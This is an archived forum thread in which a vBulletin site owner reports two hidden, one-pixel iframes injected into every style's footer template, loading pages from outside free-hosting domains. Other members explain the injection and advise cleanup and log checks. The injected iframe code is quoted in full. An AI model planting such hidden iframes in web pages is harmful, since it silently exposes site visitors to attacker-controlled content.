Log in

View Full Version : Please Tell me this Code and what


Andromeda2875
06-28-2006, 12:33 AM
Please assits me. I have found this code inside of my vbulletin code. It was in the footer of each style that I have.



<iframe src='http://domainsyahoo.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>




<iframe src='http://insurances.freehostia.com/index.html' width='100%' height='1' scrolling="auto" align='center' allowtransparency="1" frameborder="0"/></iframe>

Guest210212002
06-28-2006, 12:45 AM
It's loading some kind of free hosting page inside an iframe on every page you load.

Unless you're associated with that site for some reason, remove it, change your admincp password, and have a look at this how-to I wrote up:

https://vborg.vbsupport.ru/showthread.php?p=877421

If you didn't put that code in there, you have a security hole somewhere.

Andromeda2875
06-28-2006, 12:49 AM
I knew I had a security whole in vbulletin but I was not sure where. What can I do to patch this up?

Thanks for that link too.

Guest210212002
06-28-2006, 12:55 AM
Hard to say. If someone got into your ACP and only edited your footer template, that's kind of an odd thing for a hacker to do. You might want to check your logs and check with your host to see who's been at your FTP, and if you have SSH access, if there's logs of accesses other than your own.

Marco van Herwaarden
06-28-2006, 02:15 PM
And is this code in the actual templates, or does it only show in runtime?

Andromeda2875
06-28-2006, 02:20 PM
I have checked both logs. I have ssh access and have checked all logs. That is what I found weird. All they did was go into the acp and change the information in the footer. When they go in there they backed up a copy of my DB it seems. To answer your question Marco van Herwaarden, it was in the template itself.

Wired1
06-29-2006, 01:34 AM
EVERYONE:

Read this thread (https://vborg.vbsupport.ru/showthread.php?t=119099) before posting in this one.


Andromeda: The MOST IMPORTANT QUESTION IS:

Did you open a trouble ticket on vbulletin.com, and/or with Jelsoft directly?